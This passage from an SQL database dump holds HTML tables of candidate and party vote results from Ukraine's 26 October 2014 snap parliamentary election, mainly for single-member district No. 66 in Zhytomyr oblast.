Roman\',\'serif\';\">355</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=8665.html\"><span style=\"color: blue;\">Кацуба Микита Олександрович </span></a>, самовисування</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.36</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">338</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=12887.html\"><span style=\"color: blue;\">Лузін Сергій Альбертович </span></a>, самовисування</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.29</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">269</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=7360.html\"><span style=\"color: blue;\">Музира Владислав Володимирович </span></a>, самовисування</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.27</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">259</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=10349.html\"><span style=\"color: blue;\">Кузнецов Максим Михайлович </span></a>, самовисування</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.23</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">214</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=7254.html\"><span style=\"color: blue;\">Кремпіц Яніна Янушевна </span></a>, самовисування</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.22</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">212</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 63.62%; padding: 0.75pt;\" width=\"63%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp407pt001f01=910pf7201=14059.html\"><span style=\"color: blue;\">Куриненко Дмитро Андрійович </span></a>, самовисування</span></p>\r\n</td>\r\n<td style=\"width: 14.38%; padding: 0.75pt;\" width=\"14%\">&nbsp;</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.21</span></p>\r\n</td>\r\n<td style=\"width: 10.6%; padding: 0.75pt;\" width=\"10%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">197</span></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,8,'2014-10-31 06:06:44',430,'','2014-10-31 06:08:15',430,0,'0000-00-00 00:00:00','2014-10-31 06:06:44','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,53,'','',1,967,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(902,1156,'Результати партій по округу № 66','rezultati-po-partiyakh','<table style=\"width: 647px; height: 48px;\" border=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0.75pt;\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: right; line-height: normal;\" align=\"right\"><strong><span style=\"font-size: 12pt; font-family: \'Times New Roman\',\'serif\';\">Позачергові вибори народних депутатів України 26 жовтня 2014 року</span></strong><span style=\"font-size: 12pt; font-family: \'Times New Roman\',\'serif\';\"><br /> Cтаном на : 31.10.2014 07:34:30</span></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"width: 646px; height: 44px;\" border=\"0\" cellspacing=\"1\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0.75pt;\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 12pt; font-family: \'Times New Roman\',\'serif\';\">Одномандатний виборчий округ №66<br /> </span><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">(Житомирська область)</span></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\" cellspacing=\"1\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 80%; padding: 0.75pt;\" width=\"80%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 12pt; font-family: \'Times New Roman\',\'serif\';\">Кількість дільниць в окрузі</span></p>\r\n</td>\r\n<td style=\"width: 20%; padding: 0.75pt;\" width=\"20%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><strong><span style=\"font-size: 12pt; font-family: \'Times New Roman\',\'serif\';\">298</span></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80%; padding: 0.75pt;\" width=\"80%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 12pt; font-family: \'Times New Roman\',\'serif\';\">% опрацьованих протоколів</span></p>\r\n</td>\r\n<td style=\"width: 20%; padding: 0.75pt;\" width=\"20%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><strong><span style=\"font-size: 12pt; font-family: \'Times New Roman\',\'serif\';\">100.00</span></strong></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"width: 657px; height: 654px;\" border=\"0\" cellspacing=\"1\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">Партія</span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">Графік </span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">% ЗА</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">Голосів ЗА</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=182.html\"><span style=\"color: blue;\">Політична партія \"НАРОДНИЙ ФРОНТ\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">25.58</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">24 346</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=202.html\"><span style=\"color: blue;\">ПАРТІЯ \"БЛОК ПЕТРА ПОРОШЕНКА\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">22.35</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">21 276</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=144.html\"><span style=\"color: blue;\">Радикальна Партія Олега Ляшка</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">14.98</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">14 262</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=185.html\"><span style=\"color: blue;\">Політична партія \"Об’єднання \"САМОПОМІЧ\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">7.81</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">7 442</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=149.html\"><span style=\"color: blue;\">політична партія Всеукраїнське об’єднання \"Батьківщина\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">7.08</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">6 741</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=155.html\"><span style=\"color: blue;\">політична партія Всеукраїнське об’єднання \"Свобода\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">4.03</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">3 844</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=206.html\"><span style=\"color: blue;\">ПОЛІТИЧНА ПАРТІЯ \"ВСЕУКРАЇНСЬКЕ АГРАРНЕ ОБ’ЄДНАННЯ \"ЗАСТУП\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">3.95</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">3 768</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=199.html\"><span style=\"color: blue;\">Політична партія \"Опозиційний блок\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">2.65</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">2 526</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=164.html\"><span style=\"color: blue;\">Політична партія \"Громадянська позиція (Анатолій Гриценко)\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">2.58</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">2 460</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=142.html\"><span style=\"color: blue;\">Комуністична партія України</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">2.53</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">2 409</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=176.html\"><span style=\"color: blue;\">Партія Сергія Тігіпка \"Сильна Україна\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">2.33</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">2 222</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=158.html\"><span style=\"color: blue;\">Політична партія \"ПРАВИЙ СЕКТОР\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">1.08</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">1 031</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=209.html\"><span style=\"color: blue;\">Партія \"Солідарність жінок України\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.59</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">566</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=178.html\"><span style=\"color: blue;\">Політична Партія \"5.10\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.30</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">291</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=203.html\"><span style=\"color: blue;\">Політична партія \"Єдина Країна\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.27</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">258</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=153.html\"><span style=\"color: blue;\">Українська партія \"Зелена планета\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">0.24</span></p>\r\n</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 8pt; font-family: \'Times New Roman\',\'serif\';\">229</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 205.95pt; padding: 0.75pt;\" width=\"275\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp502pt001f01=910pf7171=139.html\"><span style=\"color: blue;\">Партія Зелених України</span></a></span></p>\r\n</td>\r\n<td style=\"width: 50.7pt; padding: 0.75pt;\" width=\"68\">&nbsp;</td>\r\n<td style=\"width: 48.15pt; padding: 0.75pt;\" width=\"64\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span 